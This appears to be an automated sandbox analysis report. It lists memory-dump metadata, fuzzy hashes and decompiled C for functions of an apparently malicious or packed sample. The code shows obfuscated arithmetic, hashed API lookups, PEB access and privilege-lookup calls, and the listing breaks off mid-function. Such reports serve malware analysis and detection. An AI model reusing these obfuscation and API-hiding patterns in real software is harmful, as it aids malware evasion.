0x02345db3
0x02345dc0
0x02345dc5
0x02345dcc
0x02345dde
0x02345df7
0x02345e03
0x02345e06
0x02345e0e
0x02345e16
0x02345e1f
0x02345e2a
0x02345e36
0x02345e3b
0x02345e3e
0x02345e40
0x02345e40
0x02345e53
0x02345e5b
0x02345e68
0x02345e72
0x02345e84
0x02345e92
0x02345eb9
0x02345ec8
0x02345ecd
0x02345ed0
0x02345ed0
0x02345ed7
0x02345ee1
0x02345ee1
0x02345ee7
0x02345eec
0x02345ef3
0x02345ef6
0x02345f04
0x02345f13
0x02345f31
0x02345f45
0x02345f59
0x02345f72
0x02345f9c
0x02345fc2

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f165a1d18a4618ee64ec982f71294e395fe567192d6f8ecf4e07baccbb45bea4
Instruction ID: ad4b014c9558d8d4e3d9b39539ca13afac1e2c5e66b04e626c78fbde44f30c06
Opcode Fuzzy Hash: f165a1d18a4618ee64ec982f71294e395fe567192d6f8ecf4e07baccbb45bea4
Instruction Fuzzy Hash: 88913BF7D102245BE711AA74BC42A6F75A69B55325B4A0230ED1CB7381FA316F24CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 02333A30, Relevance: .1, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02333A30(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed char _t68;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed char _t88;
				signed int _t95;
				signed char _t96;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t109;
				signed char _t113;
				signed int _t114;
				signed int _t133;
				signed int _t145;
				signed int _t147;
				signed char _t156;
				signed int _t157;
				signed int _t162;
				signed int _t163;

				_t97 = _a12;
				_t68 = (((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) << 6) + ((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) * 2 + 0xd6;
				_t156 = _t68;
				_t69 = _t68 * _t97;
				_t145 = _a8;
				if((_t68 * _t97 >> 0x00000020 | _t68 ^ _t97) != 0) {
					_v32 = _t156;
					_t98 = _a4;
				} else {
					_t98 = _a4;
					_t95 = (_t69 + _t156 & 0x000000ff | _t98) & _a12;
					_t96 = _t95 - _t98;
					_v32 = _t96;
					_t69 = _t95;
					_v28 = _t96 + _t69;
				}
				_v20 = _t69;
				_t157 = _t69;
				_t72 = E02339C60(_t98, _t145, _t157, _t157 >> 0x1f);
				_v24 = 0;
				if((_t145 ^ _a16 | _t98 ^ _a12) != 0) {
					_t109 = _a12;
				} else {
					_t109 = _a12;
					if((_t72 & 0x00000001) != 0) {
						_t88 = _v20 * _v28;
						_t145 = (_t88 + _t109) * _t157;
						_v24 = (_t88 & 0x000000ff) + _t145;
					}
				}
				_t73 = _t109;
				_t74 = _t73 * _t98;
				_v28 = _t74;
				_t162 = _a16 * _t98 + _t109 * _a8 + (_t73 * _t98 >> 0x20);
				_t113 = _v24 + _t145;
				_v24 = _t113;
				_t100 = _t113 * _t74;
				_t76 = E02339D50(0x647420ac) & (_t145 ^ _t100);
				_t114 = _t76;
				_t101 = _t100 | _t114;
				_v20 = _t162;
				_t147 = _v28;
				_t163 = _t147;
				if((_t147 ^ _a12 | _t162 ^ _a16) == 0) {
					L10:
					_t101 = _t101 * _t114 + _v24;
					_t79 = _t163 * _v32;
					_t133 = _t79 * _t101 >> 0x20;
					_t76 = (_t79 * _t101 & 0x000000ff) * 0x00000045 | _t101;
					goto L11;
				} else {
					_t133 = _t163;
					if((_a8 ^ _v20 | _a4 ^ _t133) == 0) {
						L11:
						 *0x23520d8 = ((_t133 & _t133 + _t76 & 0x000000ff) + _t76) * _t101;
						return _t133;
					}
					_t163 = _t133;
					if((_v32 >> 0x0000001f ^ _a16 | _a12 ^ _v32) != 0) {
						_t133 = _t163;
						goto L11;
					}
					goto L10;
				}
			}

0x02333a39
0x02333a50
0x02333a5f
0x02333a61
0x02333a65
0x02333a68
0x02333a8b
0x02333a8e
0x02333a6a
0x02333a71
0x02333a76
0x02333a7b
0x02333a7d
0x02333a82
0x02333a86
0x02333a86
0x02333a91
0x02333a94
0x02333aa0
0x02333ab2
0x02333abb
0x02333ae0
0x02333abd
0x02333ac0
0x02333ac3
0x02333ac8
0x02333ad0
0x02333adb
0x02333adb
0x02333ac3
0x02333ae3
0x02333ae5
0x02333ae9
0x02333afa
0x02333aff
0x02333b01
0x02333b07
0x02333b19
0x02333b1b
0x02333b1e
0x02333b20
0x02333b28
0x02333b2b
0x02333b32
0x02333b5c
0x02333b63
0x02333b69
0x02333b6c
0x02333b77
0x00000000
0x02333b34
0x02333b34
0x02333b45
0x02333b79
0x02333b8c
0x02333b9d
0x02333b9d
0x02333b47
0x02333b5a
0x02333b9e
0x00000000
0x02333b9e
0x00000000
0x02333b5a

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6584b2ebe33af89bd19043ff879a053a135632ce5c4a34db2744cf7d809e4cbb
Instruction ID: bbfd511f8f66a2776848a395c40d434acb424056faaea704b2c8194164b7de85
Opcode Fuzzy Hash: 6584b2ebe33af89bd19043ff879a053a135632ce5c4a34db2744cf7d809e4cbb
Instruction Fuzzy Hash: C5418772F001294B9B08CE59CC915FFB7EAEBD8210B15806AE855E7351D674AE06CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02339A60, Relevance: .1, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E02339A60(void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _t41;
				signed char _t42;
				signed int _t43;
				signed char _t45;
				signed int _t50;
				signed int _t54;
				signed int _t55;
				signed char _t59;
				signed int _t61;
				signed char _t66;
				signed int _t67;
				signed int _t68;
				signed char _t71;
				signed int _t78;
				signed char _t83;
				signed char _t85;
				signed int _t86;
				signed int _t94;
				signed int _t105;
				signed int _t116;

				_t105 = _a4;
				_t59 = (_t105 ^ 0x000000f5) - _t105;
				_t41 = E02337DD0(0xa4) & _t59;
				_t78 = _t41 * _t59 >> 0x20;
				_t42 = _t41 * _t59;
				_t68 = _t42;
				_t61 = _t42 & _t105;
				_t43 = _a8;
				asm("sbb eax, [ebp+0x14]");
				if(_t105 < _a12) {
					_t55 = _t68 + _t61;
					_t78 = _t55 * _t78 >> 0x20;
					_t68 = _t55 * _t78;
					_t43 = _t68;
					_v20 = _t43;
					_t61 = 0;
				}
				if((_t68 >> 0x0000001f ^ _a8 | _t68 ^ _t78) == 0) {
					_t94 = _a12;
				} else {
					_t94 = _a12;
					if((_t68 >> 0x0000001f ^ _a16 | _t68 ^ _t94) != 0) {
						_t54 = _v20;
						_t67 = _t61 & _t54 * _t94;
						_t43 = _t54 + _t67 + 0xe;
						_t68 = _t67;
					}
				}
				_v24 = 0;
				if((_a8 ^ _a16 | _a4 ^ _t94) != 0) {
					_v24 = 0x1cb;
				}
				_t83 = _t43 ^ _v20;
				_t45 = _t68 & _t83;
				_t66 = _t45 + 0xfffffefa;
				if((_t83 >> 0x0000001f ^ _a8 | _t83 ^ _a4) != 0 || (_t66 >> 0x0000001f ^ _a8 | _t66 ^ _a4) != 0) {
					_t71 = (_t68 ^ _t68 ^ _t66) + _t83;
					_t83 = _t71;
					_t68 = _t45 + (_t71 + _t66 & _t45) + (_t71 + _t66 & _t45);
				}
				_v20 = _t83;
				_t116 = _t83;
				if((_a16 ^ _t116 >> 0x0000001f | _a12 ^ _t116) == 0) {
					L14:
					_t50 = (_t68 ^ _v20) - _t66;
					_t85 = _v24;
					_t86 = _t50 * _t85 >> 0x20;
					_t68 = _t50 * _t85;
					goto L15;
				} else {
					asm("sbb eax, edi");
					if(_t116 >= _a4) {
						goto L14;
					}
					_t86 = _v24;
					L15:
					 *0x2352098 = _t68;
					return _t86;
				}
			}

0x02339a6c
0x02339a77
0x02339a88
0x02339a8a
0x02339a8a
0x02339a8c
0x02339a91
0x02339a96
0x02339a98
0x02339a9b
0x02339a9f
0x02339aa1
0x02339aa3
0x02339aa5
0x02339aa8
0x02339aab
0x02339aab
0x02339ac0
0x02339aeb
0x02339ac2
0x02339aca
0x02339ad4
0x02339ad6
0x02339ade
0x02339ae3
0x02339ae7
0x02339ae7
0x02339ad4
0x02339afb
0x02339b04
0x02339b06
0x02339b06
0x02339b0f
0x02339b14
0x02339b19
0x02339b2f
0x02339b46
0x02339b48
0x02339b52
0x02339b52
0x02339b57
0x02339b5a
0x02339b70
0x02339b7e
0x02339b83
0x02339b85
0x02339b88
0x02339b8a
0x00000000
0x02339b72
0x02339b75
0x02339b77
0x00000000
0x00000000
0x02339b79
0x02339b8c
0x02339b8f
0x02339b9d
0x02339b9d

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c69613ede7ff4dda36a3c9ac9973e7667d1eb2a8b35046679bf7c1027ae671c
Instruction ID: 2a494278c8944f02222386d55b85cae281f0413f298d8df351521179e07f1063
Opcode Fuzzy Hash: 7c69613ede7ff4dda36a3c9ac9973e7667d1eb2a8b35046679bf7c1027ae671c
Instruction Fuzzy Hash: 92418433F405298B9B10CE6998911EFB3E6AFD8320B1A8525DC58BB744D674FE06CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 02348830, Relevance: .1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02348830(void* __ecx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t26;
				intOrPtr* _t28;
				void* _t34;
				void* _t42;
				signed short _t45;
				signed int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t57;
				intOrPtr* _t61;
				intOrPtr* _t62;
				void* _t63;
				signed short _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t73;
				intOrPtr* _t79;
				intOrPtr _t81;

				_t26 = E023400D0(_a8);
				_t68 = _t67 + 4;
				_t76 = _t26;
				_v32 = _t26;
				if(_t26 == 0) {
					L6:
					return 0;
				}
				_t48 = _a4;
				_t28 = E02349180(_t76, _a4);
				_t69 = _t68 + 4;
				_t61 = _t28;
				if(_t61 != 0) {
					if( *_t61 == 0) {
						goto L6;
					}
					_t62 = _t61 + 0x14;
					_t79 = _t62;
					while(1) {
						_t34 = E0233ACF0(E02331460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2, _t79, _a8, E02331460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2);
						_t69 = _t69 + 0x10;
						if(_t34 == 0) {
							break;
						}
						_t81 =  *_t62;
						_t62 = _t62 + 0x14;
						if(_t81 != 0) {
							continue;
						}
						goto L6;
					}
					_t51 =  ~(E02331460(__eflags, E023322E0(__eflags, 0,  *((intOrPtr*)(_t62 - 0x14))),  ~_t48));
					E02331460(__eflags,  *((intOrPtr*)(_t62 - 0x14)), _a4);
					_t73 = _t69 + 0x18;
					_t66 =  *_t51;
					_v28 = _t51;
					__eflags = _t66;
					if(_t66 == 0) {
						L12:
						return 1;
					}
					_t54 = _a4;
					_t63 = 0;
					_t55 = _t54 + 0xd8be785;
					__eflags = _t55;
					_v24 = _t55;
					_v20 =  *((intOrPtr*)(_t62 - 4)) + _t54;
					while(1) {
						E02333750(__eflags, _t66, 0xffff);
						_t42 = E02339D50(0x960018d7);
						__eflags = _t66;
						_t57 = _v24 + _t66;
						_t44 =  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2;
						_t45 = E02346B30(_t66, _v32,  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2);
						_t73 = _t73 + 0x14;
						__eflags = _t45;
						_t55 = (_t57 & 0xffffff00 | _t45 != 0x00000000) & _t55;
						__eflags = _t45;
						 *(_v20 + _t63) = _t45;
						if(_t45 == 0) {
							break;
						}
						_t66 =  *(_v28 + _t63 + 4);
						_t63 = _t63 + 4;
						__eflags = _t66;
						if(__eflags != 0) {
							continue;
						}
						goto L12;
					}
					return _t55;
				}
				return 1;
			}

0x0234883c
0x02348841
0x02348844
0x02348846
0x02348849
0x0234889c
0x00000000
0x0234889c
0x0234884b
0x0234884f
0x02348854
0x02348857
0x0234885d
0x02348862
0x00000000
0x00000000
0x02348864
0x02348864
0x02348870
0x02348888
0x0234888d
0x02348892
0x00000000
0x00000000
0x02348894
0x02348897
0x0234889a
0x00000000
0x00000000
0x00000000
0x0234889a
0x023488c2
0x023488c8
0x023488cd
0x023488d0
0x023488d2
0x023488d5
0x023488d7
0x0234894a
0x00000000
0x0234894a
0x023488dc
0x023488df
0x023488e3
0x023488e3
0x023488e9
0x023488ec
0x023488f0
0x023488f8
0x02348905
0x02348910
0x02348915
0x0234891c
0x02348923
0x02348928
0x0234892e
0x02348933
0x02348935
0x02348937
0x0234893a
0x00000000
0x00000000
0x0234893f
0x02348943
0x02348946
0x02348948
0x00000000
0x00000000
0x00000000
0x02348948
0x00000000
0x02348951
0x023488a5

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d56140c696fb06c434bb8954bb3fc7c383ecb2ca708e747274fb9fee3d7b59
Instruction ID: dbcf21192790e7ad90fef8b2b66456450ed530d3442780ed47e7ee3ced64ec38
Opcode Fuzzy Hash: c3d56140c696fb06c434bb8954bb3fc7c383ecb2ca708e747274fb9fee3d7b59
Instruction Fuzzy Hash: 8431C6B6E001169BEB219A64EC41BBB77A9EF51358F054174ED08AB341EB31EE11CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02339C60, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E02339C60(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _t35;
				signed int _t36;
				signed int _t38;
				signed int _t42;
				signed int _t44;
				signed char _t45;
				signed int _t49;
				signed char _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				signed int _t60;
				signed int _t75;
				signed int _t76;
				signed int _t88;
				signed int _t94;
				signed int _t95;

				_t95 = _a12;
				_t35 = _a4 * 0xffffffa5 * _t95;
				_t53 = _t35 - _t95;
				_t49 = 0;
				if((_t35 >> 0x0000001f ^ _a16 | _t35 ^ _t95) != 0) {
					_t36 = _a4;
					_t75 =  !_t95 & (_t53 | _t35) + _t36;
					_t38 = _t75 * 0x73;
					_t53 = _t75;
					_t76 = _t36;
				} else {
					_t38 = 0;
					_t76 = _a4;
				}
				asm("sbb edx, [ebp+0xc]");
				if(_t95 >= _t76) {
					_t49 = 0x3a1;
				}
				_t56 = _t53;
				_t94 = (_t38 & _t95 ^ _t49) * _t56 * 0x77;
				_t57 = _t56 ^ _t94;
				_t42 = _t49;
				_v24 = _t57;
				_v32 = _t42;
				_t51 = _t57 * _t42;
				_t44 = E02337DD0(0xc5) * _t51;
				_v17 = _t44;
				_v28 = _t94;
				_t45 = _t44 * _t94;
				_t60 = _a8;
				asm("sbb edx, ecx");
				if(_t51 >= _a4) {
					L8:
					_t88 = (_v24 + _t45 * _a4 - _t45 * _a4 ^ _v28) + _t45 * _a4 ^ _v17;
				} else {
					_t88 = _t60 ^ _a16 | _t95 ^ _a4;
					if(_t88 == 0 || (_t51 >> 0x0000001f ^ _a16 | _t95 ^ _t51) != 0) {
						goto L8;
					}
				}
				 *0x2352100 = _t88;
				return _v32;
			}

0x02339c69
0x02339c73
0x02339c7c
0x02339c85
0x02339c89
0x02339c94
0x02339c9f
0x02339ca4
0x02339ca7
0x02339ca9
0x02339c8b
0x02339c8b
0x02339c8d
0x02339c8d
0x02339cb0
0x02339cb3
0x02339cb5
0x02339cb5
0x02339cbe
0x02339cc4
0x02339cc7
0x02339cc9
0x02339ccb
0x02339cd0
0x02339cd3
0x02339ce3
0x02339ce5
0x02339cea
0x02339ced
0x02339cfa
0x02339cfd
0x02339cff
0x02339d1e
0x02339d38
0x02339d01
0x02339d0b
0x02339d0d
0x00000000
0x00000000
0x02339d0d
0x02339d3a
0x02339d4a

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0ce9c6cad3e611c5397b857d992a67eb4ee7c3ff7a1aae5bdc3981a5163bc3
Instruction ID: 3ce147e3aedb21e6f0d62724a80488b161004bb8c865da523f3b56818b7580c1
Opcode Fuzzy Hash: 5f0ce9c6cad3e611c5397b857d992a67eb4ee7c3ff7a1aae5bdc3981a5163bc3
Instruction Fuzzy Hash: DE31EB31B000199B9B0DCE6DC8D26BFBBEBABC4201B14C13FD809DB648D9709A0687C0

Uniqueness

Uniqueness Score: -1.00%

Function 02410865, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160977472.0000000002410000.00000040.00020000.sdmp, Offset: 02410000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 24b8939be20bfbd18f925857451620731763b5086fe09fd5b6c77b6e15f309a9
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: FB1193733442009FD714DE59DC80FA2B3EAEB98230B29816AED04CB315D775E882C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 02410C5E, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2160977472.0000000002410000.00000040.00020000.sdmp, Offset: 02410000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 08a570041580ff7d4cf579fad2f6c035790da5985dbbaae73665de8584920a7e
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: F30192773052408FD718CB29D984DBABBE8EBC5624B19907FC94687716F224E4CACD20

Uniqueness

Uniqueness Score: -1.00%

Function 0234CE40, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0234CE40(short* _a4, intOrPtr _a8) {
				void* _t8;
				short* _t9;
				intOrPtr _t10;
				short* _t11;
				void* _t12;

				_t10 = _a8;
				_t11 = _a4;
				if(_t10 != 0) {
					_t11 = _t11 + 2;
					_t9 = 0;
					while( *((short*)(_t11 - 2)) != 0) {
						L3:
						_t11 = _t11 + 2;
					}
					if( *_t11 == 0) {
						_t11 = 0;
					} else {
						_t8 = E02339D50(0x1e99166a);
						_t12 = _t12 + 4;
						_t9 = _t9 + _t8 - 0x7aed16c5;
						if(_t9 != _t10) {
							goto L3;
						} else {
						}
					}
				}
				return _t11;
			}

0x0234ce46
0x0234ce49
0x0234ce4e
0x0234ce50
0x0234ce53
0x0234ce5a
0x0234ce60
0x0234ce60
0x0234ce63
0x0234ce6e
0x0234ce8a
0x0234ce70
0x0234ce75
0x0234ce7a
0x0234ce7d
0x0234ce86
0x00000000
0x00000000
0x0234ce88
0x0234ce86
0x0234ce6e
0x0234ce92

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8db077be36dd7dd0c03fe44961d1943ba693b2158ba0f316bbeb6675301aaf28
Instruction ID: 40d945b6444b94c989cc13749d16ad994597b64297d114cf45edfb27f4db7a24
Opcode Fuzzy Hash: 8db077be36dd7dd0c03fe44961d1943ba693b2158ba0f316bbeb6675301aaf28
Instruction Fuzzy Hash: 6DF02722E0122886E7305E54D881966F3F9EB41E59F09A46BD80853250A7B178C8C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 02342EF0, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02342EF0() {

				return  *[fs:0x30];
			}

0x02342ef6

Memory Dump Source

Source File: 00000004.00000002.2160881633.0000000002331000.00000020.00020000.sdmp, Offset: 02330000, based on PE: true

Associated: 00000004.00000002.2160877703.0000000002330000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160901061.0000000002350000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2160909033.0000000002352000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2160913197.0000000002355000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 023F86D9, Relevance: 19.6, APIs: 13, Instructions: 109memorythreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0240CB9C,?,023F6F6A), ref: 023F86DF
__mtterm.LIBCMT ref: 023F86EB

Part of subcall function 023F83C3: __decode_pointer.LIBCMT ref: 023F83D4
Part of subcall function 023F83C3: TlsFree.KERNEL32(0240F0B8,023F7006), ref: 023F83EE

TlsAlloc.KERNEL32 ref: 023F8778
__init_pointers.LIBCMT ref: 023F879D
__encode_pointer.LIBCMT ref: 023F87A8
__encode_pointer.LIBCMT ref: 023F87B8
__encode_pointer.LIBCMT ref: 023F87C8
__encode_pointer.LIBCMT ref: 023F87D8
__decode_pointer.LIBCMT ref: 023F87F9
__calloc_crt.LIBCMT ref: 023F8812
__decode_pointer.LIBCMT ref: 023F882C
GetCurrentThreadId.KERNEL32 ref: 023F8842

Memory Dump Source

Source File: 00000004.00000002.2160916994.0000000002356000.00000020.00020000.sdmp, Offset: 02356000, based on PE: false

Similarity

API ID: __encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThread__calloc_crt__init_pointers__mtterm
String ID:
API String ID: 802150526-0
Opcode ID: 3f8d64bcbaec9f0c9f57e92f846f4cc3b9fb26831d433aaf77e7ceb9cf2bbd34
Instruction ID: a869df9c5a9a18eb94df22dbe33d69740226fa577b405f5e293ad22249d9a90e
Opcode Fuzzy Hash: 3f8d64bcbaec9f0c9f57e92f846f4cc3b9fb26831d433aaf77e7ceb9cf2bbd34
Instruction Fuzzy Hash: DB31B271D823009ADBBCAF76F984B153BA2FB01320B525D2BE614B7190DB75D1A8CF50

Uniqueness

Uniqueness Score: -1.00%

Function 023F885D, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 023F887B

Part of subcall function 023FB081: __mtinitlocknum.LIBCMT ref: 023FB095
Part of subcall function 023FB081: __amsg_exit.LIBCMT ref: 023FB0A1
Part of subcall function 023FB081: RtlEnterCriticalSection.NTDLL(?), ref: 023FB0A9

___sbh_find_block.LIBCMT ref: 023F8886
___sbh_free_block.LIBCMT ref: 023F8895
HeapFree.KERNEL32(00000000,?,0240DDA8), ref: 023F88C5
GetLastError.KERNEL32(?,023F88F8,?,00000001,?,023FB00B,00000018,0240DE68,0000000C,023FB09A,?,?,?,023F85D2,0000000D,0240DD80), ref: 023F88D6

Memory Dump Source

Source File: 00000004.00000002.2160916994.0000000002356000.00000020.00020000.sdmp, Offset: 02356000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: ae7287e3238467d36e2566bd237a86f3d9fc03a7baec6bbf353ff6c3d6900f06
Instruction ID: 2daf0610ea9113a296c660ee322a71c13b700ab19058e5819aca017a0be3e2d9
Opcode Fuzzy Hash: ae7287e3238467d36e2566bd237a86f3d9fc03a7baec6bbf353ff6c3d6900f06
Instruction Fuzzy Hash: 2101A231D00301EAEBB87BB1FD04B4E7BB69F40724F200029E714A60C0CB3885849F55

Uniqueness

Uniqueness Score: -1.00%

Function 023346E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E023346E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x023346e7
0x023346ea
0x023346ed
0x023346f4
0x023346fa
0x023346ff
0x02334709
0x02334711
0x02334713
0x02334715
0x02334718
0x02334720
0x02334725
0x02334781
0x02334784
0x02334786
0x02334791
0x0233479a
0x0233479f
0x023347a1
0x023347a3
0x023347ab
0x00000000
0x00000000
0x0233472c
0x02334731
0x0233473a
0x023347ad
0x023347ad
0x023347b6
0x023347ca
0x023347ca
0x023347cd
